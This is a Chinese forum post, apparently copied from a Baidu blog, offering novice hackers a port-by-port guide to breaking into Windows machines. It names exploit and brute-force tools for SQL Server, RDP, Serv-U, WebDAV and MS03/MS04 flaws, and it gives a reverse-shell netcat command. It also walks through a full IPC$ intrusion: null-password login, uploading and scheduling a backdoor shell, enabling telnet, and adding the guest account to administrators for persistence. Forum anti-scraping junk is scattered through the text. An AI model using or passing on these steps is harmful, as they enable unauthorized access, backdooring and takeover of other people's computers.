TA的每日心情 | 衰 2019-8-18 09:37 |
---|
签到天数: 2 天 [LV.1]初来乍到
|
来源:hi.baidu
% [: Q. l/ C" C) x" K9 h+ T V希望对新手入侵有帮助! 5 B! I. u, k0 A( T
1. 1433端口入侵
: z( Z4 R/ X' R. u; w scanport.exe 查有1433的机器6 z3 r+ }9 U/ n0 R( r. x
SQLScanPass.exe 进行字典暴破(字典是关键)
! O( d5 n# \6 p" E+ F! L 最后 SQLTools.exe入侵对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。/ i; ]' o( J6 C5 ]+ W9 Y
nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口8 T* x! v2 U8 E" ~; K5 Z/ D
(以上反向的,测试成功)
+ b+ m, M0 Y* e- n9 m% |1 f1 [- E sqlhelloz.exe 入侵ip 1433 (这个是正向连接)2 c+ v* h' M* ?) U
2. 4899端口入侵: `3 k* J7 C$ L- Y: i/ y
用4899过滤器.exe,扫描空口令的机器( ^( `2 h- f0 Y ~% f9 S: s
3. 3899的入侵
+ g# a- t9 A o* y) \5 d# Q |" J 对很早的机器,可以试试3389的溢出(win3389ex.exe)* Z% v9 D& v3 M# w4 k
对2000的机器,可以试试字典暴破。(tscrack.exe)
+ V8 m9 f8 ]+ W 4. 80入侵/ Q5 Z( J% Y% J e
对sp3以前的机器,可以用webdav入侵;% f' g# e7 D9 n) @7 a r
对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe)
6 w2 d W4 E G" b& ]' O% D 可以利用SQL进行注入。(啊D的注入软件)。
2 d+ f% _: y, ]/ I1 y 5. serv-u入侵(21端口): a4 b; m7 D6 G7 j) p; z. l
对5. 004及以下系统,可用溢出入侵。(serv5004.exe)
# W; W7 d' }8 g ~ 对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe)
9 Z: M' t9 g( a 对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs)+ k' n0 a5 l1 A7 F' [4 Z# p$ U
输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码! a7 Y$ `9 U3 d! m8 `3 |- k
6. 554端口* d8 q& R" Z6 P$ v
用real554.exe入侵。' T) _. t! t6 K: K2 u
7. 6129端口
+ b) {* W% R" \+ V. ~ 用DameWare6129.exe入侵。
: A) x: w# c+ L, ^: r: N 8. 系统漏洞/ Y* x0 z6 S. |( n& m' y
利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,进行溢出入侵。4 c g% d2 O2 v7 ^% F! D
9. 3127等端口5 ?$ ~/ u& ~( P
! m* ]0 A3 ]4 b1 O
可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。1 o, e$ _3 s% s# M$ w1 x3 W( P* F" h
10. 其他入侵 l. y D1 g7 D$ v3 F7 M: A: s. @
利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。
6 [5 a3 o2 p& o# m2 W, B7 O4 a, t+ b9 ^- D. [
经典IPC$入侵
4 y8 i; c# F% {- Z' ^3 M+ T# G7 I
1. C:\>net use $">\\127.0.0.1\IPC$ "" /user:"admintitrators"
5 f0 j5 {! o& Q$ [7 ?+ w4 E, n$ b 这是用"流光"扫到的用户名是administrators,密码为"空"的IP地址(气好到家如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连接,因为密码为"空",所以第一个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。7 C/ v. |1 o( j) h
2. C:\>copy srv.exe $">\\127.0.0.1\admin$; Z3 j& z/ {0 m1 {4 H
先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。 J& a/ Z! F. R5 E
3. C:\>net time file://127.0.0.1/
0 X$ [ k# [+ o/ t: T* M9 |2 M 查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。1 j" E% X) a, [' `
4. C:\>at file://127.0.0.1/ 11:05 srv.exe! L1 r$ r5 d- I# |4 ^+ B
用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊.
" \* |% ?; [5 b* t/ K. F$ X- K/ @& R 5. C:\>net time file://127.0.0.1/
3 `0 C3 Z! z$ b0 v5 R 再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备开始下面的命令。8 c* c1 F o T- R* l) y
6. C:\>telnet 127.0.0.1 99& u* r* [7 T: q- |5 ~6 \" z
这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。
9 w$ G# x" I/ h 虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了
! Q4 u) W3 C; T2 `0 r' j1 j% w 7.C:\>copy ntlm.exe $">\\127.0.0.1\admin$2 t+ J) Q6 A1 `- z
用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。$ I0 K L$ p/ K1 x7 l) I9 T( U+ `
8. C:\WINNT\system32>ntlm+ ~+ [6 b& K. w; z
输入ntlm启动(这里的C:\WINNT\system32>指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出现"DONE"的时候,就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务!# ]' s# i' n7 V7 S
9. Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)为了以防万一,我们再把guest激活加到管理组
7 }; m8 y% [$ s 10. C:\>net user guest /active:yes3 l3 ]2 P' A: c$ I- O2 e; n$ R
将对方的Guest用户激活
; S% z4 }. I ^$ G, T3 O# c 11. C:\>net user guest 12344 H( h3 r, z& x3 Q- ?3 }; v8 `; B
将Guest的密码改为1234,或者你要设定的密码
3 \6 ?6 [ e* @ v: k 12. C:\>net localgroup administrators guest /add1 j, ~5 ?# j6 P) u' \
将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算机) |
|